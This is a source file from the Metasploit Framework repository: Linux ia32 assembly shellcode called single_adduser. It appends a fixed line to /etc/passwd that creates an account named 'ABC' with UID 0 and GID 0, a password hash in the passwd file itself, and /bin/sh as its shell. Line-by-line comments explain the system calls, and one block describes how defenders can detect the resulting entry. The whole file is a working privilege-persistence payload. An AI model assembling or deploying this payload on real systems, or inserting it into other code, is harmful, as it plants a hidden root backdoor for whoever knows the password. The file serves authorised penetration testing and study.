GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/linux/ia32/single_adduser.asm
;;
;
;        Name: single_adduser
;     Authors: vlad902 <vlad902 [at] gmail.com>
;     Authors: spoonm <ninjatools [at] hush.com>
;     Authors: skape <mmiller [at] hick.org>
;     Version: $Revision: 1513 $
;     License:
;
;        This file is part of the Metasploit Exploit Framework
;        and is subject to the same licenses and copyrights as
;        the rest of this package.
;
; Description:
;
;        Add a line to /etc/passwd.
;
; Meta-Information:
;
; meta-shortname=Linux adduser
; meta-description=Create an entry in /etc/passwd with UID=0
; meta-authors=vlad902 <vlad902 [at] gmail.com>, spoonm <ninjatools [at] hush.com>, skape <mmiller [at] hick.org>
; meta-os=linux
; meta-arch=ia32
; meta-category=single
; meta-name=adduser
; meta-basemod=Msf::PayloadComponent::NoConnection
; Offset for inserting the string:
; meta-custom1=0x27
; Offset after string:
; meta-custom2=0x4b
;;


BITS 32
global _start

%include "generic.asm"

;-----------------------------------------------------------------------
; _start -- open /etc//passwd for append, write one fixed entry, exit.
;
; Target:  Linux ia32, NASM syntax. System calls go through int 0x80
;          with eax = call number and ebx, ecx, edx = arguments 1-3.
; Layout:  no absolute addresses are used; the path is built on the
;          stack and the entry text is located with a call/pop pair.
; Errors:  no system-call return value is checked. If open fails, the
;          negative return value is passed to write as the descriptor.
;
; NOTE(review): meta-custom1/meta-custom2 in the file header are byte
; offsets into the assembled output, so they presumably depend on the
; exact encodings below and on what the setreuid macro expands to --
; confirm before changing any instruction.
;
; Defender's view: the intended effect is one line appended to
; /etc/passwd that defines an account with UID 0 and GID 0 and carries
; its password field in passwd itself. File-integrity monitoring or an
; audit watch on /etc/passwd, together with a check for unexpected
; UID 0 entries, surfaces it.
;-----------------------------------------------------------------------
_start:
        ; Macro from generic.asm (not shown here); by its name it
        ; presumably issues setreuid(0, 0) -- confirm in that file.
        setreuid 0

        ; eax = 5, the i386 open system call number, loaded with
        ; push/pop rather than a mov with a 32-bit immediate.
        push byte 0x05
        pop eax

        ; Build the NUL-terminated path on the stack, last dword first.
        xor ecx, ecx
        push ecx                        ; four zero bytes: terminator
        push dword 0x64777373           ; "sswd"
        push dword 0x61702f2f           ; "//pa" (doubled '/' pads the path to 12 bytes)
        push dword 0x6374652f           ; "/etc"
        mov ebx, esp                    ; arg 1: pointer to "/etc//passwd"
        inc ecx                         ; ecx = 0x001 (O_WRONLY)
        mov ch, 0x04                    ; ecx = 0x401 (O_WRONLY | O_APPEND)
        int 0x80                        ; open(path, flags); result in eax, not checked

        xchg eax, ebx                   ; ebx = descriptor returned by open (arg 1 of write)
        ; call pushes the address of the bytes that follow it, which is
        ; the entry text; execution resumes at getstr.
        call getstr
        ; passwd(5) fields: name "ABC", 13-character password field
        ; (the length of a traditional crypt(3) DES hash), UID 0, GID 0,
        ; empty comment, home "/", shell "/bin/sh".
        db "ABC:AAnV3m35vbc/g:0:0::/:/bin/sh"
getstr:
        pop ecx                         ; arg 2: address of the entry text
        ; The four bytes before the text are the call's relative
        ; displacement. getstr follows the text directly, so that
        ; displacement equals the text length (32 bytes as written).
        mov edx, [ecx-4]                ; arg 3: byte count
        push byte 0x04
        pop eax                         ; eax = 4, the i386 write system call number
        int 0x80                        ; write(fd, text, length); result not checked

        push byte 0x01
        pop eax                         ; eax = 1, the i386 exit system call number
        int 0x80                        ; exit; ebx still holds the descriptor value as the status